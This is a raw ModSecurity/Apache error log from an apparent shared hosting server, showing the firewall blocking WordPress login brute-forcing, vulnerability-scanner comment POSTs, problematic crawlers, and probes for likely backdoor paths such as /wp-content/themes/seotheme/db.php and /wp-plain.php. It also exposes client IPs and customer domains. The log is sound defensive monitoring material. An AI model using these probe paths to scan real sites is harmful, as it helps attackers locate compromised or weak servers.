[Tue May 26 18:09:44.870659 2026] [security2:error] [pid 960743:tid 960941] [client 162.243.230.9:50338] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWUj_QvEln_BHBy2zKXMAAAAMk"]
[Tue May 26 18:09:45.178347 2026] [security2:error] [pid 960743:tid 960997] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUkPQvEln_BHBy2zKXXwAAAQE"]
[Tue May 26 18:09:46.893054 2026] [security2:error] [pid 960743:tid 960945] [client 162.243.230.9:50544] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWUkvQvEln_BHBy2zKXpQAAAM0"]
[Tue May 26 18:09:47.053220 2026] [security2:error] [pid 960743:tid 960894] [client 138.229.103.255:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWUkvQvEln_BHBy2zKXqgAAAJo"], referer: https://www.anujtradingco.com/
[Tue May 26 18:09:47.703869 2026] [security2:error] [pid 960743:tid 960929] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUk_QvEln_BHBy2zKXuQAAAL0"]
[Tue May 26 18:09:48.557039 2026] [http2:info] [pid 973439:tid 973439] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 18:09:48.673513 2026] [security2:error] [pid 973439:tid 973571] [client 138.229.103.255:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWUlABg9mKRpdEFs3BgQAAAAAI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460465&moderation-hash=0b6715a199e3090ab739ee0c23527d85
[Tue May 26 18:09:49.443060 2026] [security2:error] [pid 973439:tid 973587] [client 82.76.238.33:60476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUlQBg9mKRpdEFs3BgVQAAABI"]
[Tue May 26 18:09:49.443264 2026] [security2:error] [pid 973439:tid 973587] [client 82.76.238.33:60476] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUlQBg9mKRpdEFs3BgVQAAABI"]
[Tue May 26 18:09:49.587808 2026] [security2:error] [pid 960743:tid 960780] [remote 222.165.190.235:54074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWUlfQvEln_BHBy2zKX3AAApCQ"]
[Tue May 26 18:09:49.665133 2026] [security2:error] [pid 973439:tid 973596] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUlQBg9mKRpdEFs3BgTQAAABs"]
[Tue May 26 18:09:49.769232 2026] [security2:error] [pid 973439:tid 973594] [client 185.191.171.14:41528] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-9-13/day/2022-08-07/"] [unique_id "ahWUlQBg9mKRpdEFs3BgWwAAABk"]
[Tue May 26 18:09:49.769367 2026] [security2:error] [pid 973439:tid 973594] [client 185.191.171.14:41528] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-9-13/day/2022-08-07/"] [unique_id "ahWUlQBg9mKRpdEFs3BgWwAAABk"]
[Tue May 26 18:09:51.007883 2026] [security2:error] [pid 973439:tid 973547] [remote 222.165.190.235:54076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWUlgBg9mKRpdEFs3BgdQAARGs"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:09:51.215049 2026] [security2:error] [pid 960743:tid 960802] [remote 38.242.237.61:51090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.237.242.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWUl_QvEln_BHBy2zKX3QAArjo"]
[Tue May 26 18:09:52.217166 2026] [security2:error] [pid 973439:tid 973588] [client 138.229.103.255:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWUmABg9mKRpdEFs3BgmAAAABM"], referer: https://anujtradingco.com
[Tue May 26 18:09:52.799063 2026] [security2:error] [pid 973439:tid 973601] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUmABg9mKRpdEFs3BgnAAAACA"]
[Tue May 26 18:09:53.025576 2026] [security2:error] [pid 973439:tid 973661] [client 46.176.156.90:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWUlwBg9mKRpdEFs3BgfQAAAFw"]
[Tue May 26 18:09:53.511953 2026] [security2:error] [pid 973439:tid 973658] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUlwBg9mKRpdEFs3BgewAAAFk"]
[Tue May 26 18:09:54.625802 2026] [security2:error] [pid 973439:tid 973691] [client 46.176.156.90:53478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUmgBg9mKRpdEFs3BgzgAAAHo"]
[Tue May 26 18:09:54.625934 2026] [security2:error] [pid 973439:tid 973691] [client 46.176.156.90:53478] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUmgBg9mKRpdEFs3BgzgAAAHo"]
[Tue May 26 18:09:54.625967 2026] [security2:error] [pid 973439:tid 973691] [client 46.176.156.90:53478] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUmgBg9mKRpdEFs3BgzgAAAHo"]
[Tue May 26 18:09:55.116771 2026] [security2:error] [pid 973439:tid 973596] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUmwBg9mKRpdEFs3Bg4gAAABs"]
[Tue May 26 18:09:55.468797 2026] [security2:error] [pid 973439:tid 973586] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUmwBg9mKRpdEFs3Bg4QAAABE"]
[Tue May 26 18:09:55.729048 2026] [security2:error] [pid 973439:tid 973625] [client 46.176.156.90:53533] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUmwBg9mKRpdEFs3Bg-AAAADg"]
[Tue May 26 18:09:55.729147 2026] [security2:error] [pid 973439:tid 973625] [client 46.176.156.90:53533] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUmwBg9mKRpdEFs3Bg-AAAADg"]
[Tue May 26 18:09:55.729183 2026] [security2:error] [pid 973439:tid 973625] [client 46.176.156.90:53533] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUmwBg9mKRpdEFs3Bg-AAAADg"]
[Tue May 26 18:09:56.046436 2026] [autoindex:error] [pid 973439:tid 973653] [client 45.148.10.204:47158] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:09:56.134081 2026] [security2:error] [pid 973439:tid 973657] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUnABg9mKRpdEFs3BhAwAAAFg"]
[Tue May 26 18:09:56.558852 2026] [security2:error] [pid 973439:tid 973569] [client 46.176.156.90:53566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUnABg9mKRpdEFs3BhFQAAAAA"]
[Tue May 26 18:09:56.558938 2026] [security2:error] [pid 973439:tid 973569] [client 46.176.156.90:53566] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUnABg9mKRpdEFs3BhFQAAAAA"]
[Tue May 26 18:09:56.558956 2026] [security2:error] [pid 973439:tid 973569] [client 46.176.156.90:53566] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUnABg9mKRpdEFs3BhFQAAAAA"]
[Tue May 26 18:09:56.961765 2026] [security2:error] [pid 973439:tid 973601] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUnABg9mKRpdEFs3BhIgAAACA"]
[Tue May 26 18:09:57.382245 2026] [security2:error] [pid 973439:tid 973627] [client 46.176.156.90:53609] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUnQBg9mKRpdEFs3BhKgAAADo"]
[Tue May 26 18:09:57.382352 2026] [security2:error] [pid 973439:tid 973627] [client 46.176.156.90:53609] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUnQBg9mKRpdEFs3BhKgAAADo"]
[Tue May 26 18:09:57.382375 2026] [security2:error] [pid 973439:tid 973627] [client 46.176.156.90:53609] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUnQBg9mKRpdEFs3BhKgAAADo"]
[Tue May 26 18:09:57.778161 2026] [security2:error] [pid 973439:tid 973619] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUnQBg9mKRpdEFs3BhOAAAADI"]
[Tue May 26 18:09:57.892345 2026] [security2:error] [pid 973439:tid 973450] [remote 54.36.102.244:50940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUnQBg9mKRpdEFs3BhNAAAPQo"]
[Tue May 26 18:09:57.902558 2026] [security2:error] [pid 973439:tid 973641] [client 20.206.67.134:6481] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWUnQBg9mKRpdEFs3BhOgAAAEg"], referer: www.google.com
[Tue May 26 18:09:57.916428 2026] [security2:error] [pid 973439:tid 973633] [client 20.206.67.134:3681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-plain.php"] [unique_id "ahWUnQBg9mKRpdEFs3BhPAAAAEA"], referer: www.google.com
[Tue May 26 18:09:58.016565 2026] [security2:error] [pid 973439:tid 973607] [client 20.206.67.134:3683] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jhonparra.com"] [uri "/index.php"] [unique_id "ahWUnQBg9mKRpdEFs3BhPQAAACY"], referer: www.google.com
[Tue May 26 18:09:58.058854 2026] [security2:error] [pid 973439:tid 973629] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUnQBg9mKRpdEFs3BhMAAAADw"]
[Tue May 26 18:09:58.194801 2026] [security2:error] [pid 973439:tid 973645] [client 46.176.156.90:53649] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUngBg9mKRpdEFs3BhSQAAAEw"]
[Tue May 26 18:09:58.194931 2026] [security2:error] [pid 973439:tid 973645] [client 46.176.156.90:53649] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUngBg9mKRpdEFs3BhSQAAAEw"]
[Tue May 26 18:09:58.194959 2026] [security2:error] [pid 973439:tid 973645] [client 46.176.156.90:53649] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUngBg9mKRpdEFs3BhSQAAAEw"]
[Tue May 26 18:09:58.607441 2026] [security2:error] [pid 973439:tid 973571] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUngBg9mKRpdEFs3BhVgAAAAI"]
[Tue May 26 18:09:58.657456 2026] [security2:error] [pid 973439:tid 973683] [client 20.206.67.134:3683] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jhonparra.com"] [uri "/index.php"] [unique_id "ahWUngBg9mKRpdEFs3BhVAAAAHI"], referer: www.google.com
[Tue May 26 18:09:58.672794 2026] [security2:error] [pid 973439:tid 973695] [client 20.206.67.134:3698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/xtfepfgm.php"] [unique_id "ahWUngBg9mKRpdEFs3BhWAAAAH4"], referer: www.google.com
[Tue May 26 18:09:59.043534 2026] [security2:error] [pid 973439:tid 973608] [client 46.176.156.90:53687] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUnwBg9mKRpdEFs3BhaQAAACc"]
[Tue May 26 18:09:59.043643 2026] [security2:error] [pid 973439:tid 973608] [client 46.176.156.90:53687] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUnwBg9mKRpdEFs3BhaQAAACc"]
[Tue May 26 18:09:59.043670 2026] [security2:error] [pid 973439:tid 973608] [client 46.176.156.90:53687] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUnwBg9mKRpdEFs3BhaQAAACc"]
[Tue May 26 18:09:59.464164 2026] [security2:error] [pid 973439:tid 973641] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUnwBg9mKRpdEFs3BheAAAAEg"]
[Tue May 26 18:09:59.497044 2026] [security2:error] [pid 973439:tid 973666] [client 20.206.67.134:3679] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-plain.php"] [unique_id "ahWUnwBg9mKRpdEFs3BhewAAAGE"], referer: www.google.com
[Tue May 26 18:09:59.545289 2026] [security2:error] [pid 973439:tid 973653] [client 20.206.67.134:6479] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWUnwBg9mKRpdEFs3BhfQAAAFQ"], referer: www.google.com
[Tue May 26 18:09:59.695105 2026] [security2:error] [pid 973439:tid 973636] [client 168.119.123.75:61476] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWUnwBg9mKRpdEFs3BhagAAAEM"], referer: http://ucdc.co.in/
[Tue May 26 18:09:59.879469 2026] [security2:error] [pid 973439:tid 973644] [client 82.76.238.33:60905] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUnwBg9mKRpdEFs3BhhgAAAEs"]
[Tue May 26 18:09:59.879679 2026] [security2:error] [pid 973439:tid 973644] [client 82.76.238.33:60905] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUnwBg9mKRpdEFs3BhhgAAAEs"]
[Tue May 26 18:09:59.890645 2026] [security2:error] [pid 973439:tid 973662] [client 46.176.156.90:53721] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUnwBg9mKRpdEFs3BhiAAAAF0"]
[Tue May 26 18:09:59.890742 2026] [security2:error] [pid 973439:tid 973662] [client 46.176.156.90:53721] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUnwBg9mKRpdEFs3BhiAAAAF0"]
[Tue May 26 18:09:59.890766 2026] [security2:error] [pid 973439:tid 973662] [client 46.176.156.90:53721] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUnwBg9mKRpdEFs3BhiAAAAF0"]
[Tue May 26 18:10:00.303359 2026] [security2:error] [pid 973439:tid 973685] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUoABg9mKRpdEFs3BhmwAAAHQ"]
[Tue May 26 18:10:00.391108 2026] [security2:error] [pid 973439:tid 973616] [client 45.148.10.204:44394] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWUnwBg9mKRpdEFs3BhgQAAAC8"]
[Tue May 26 18:10:00.396994 2026] [security2:error] [pid 973439:tid 973671] [client 45.148.10.204:44388] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWUnwBg9mKRpdEFs3BhgAAAAGY"]
[Tue May 26 18:10:00.431343 2026] [security2:error] [pid 973439:tid 973622] [client 45.148.10.204:44398] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWUnwBg9mKRpdEFs3BhhwAAADU"]
[Tue May 26 18:10:00.436226 2026] [security2:error] [pid 973439:tid 973610] [client 45.148.10.204:44392] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWUnwBg9mKRpdEFs3BhgwAAACk"]
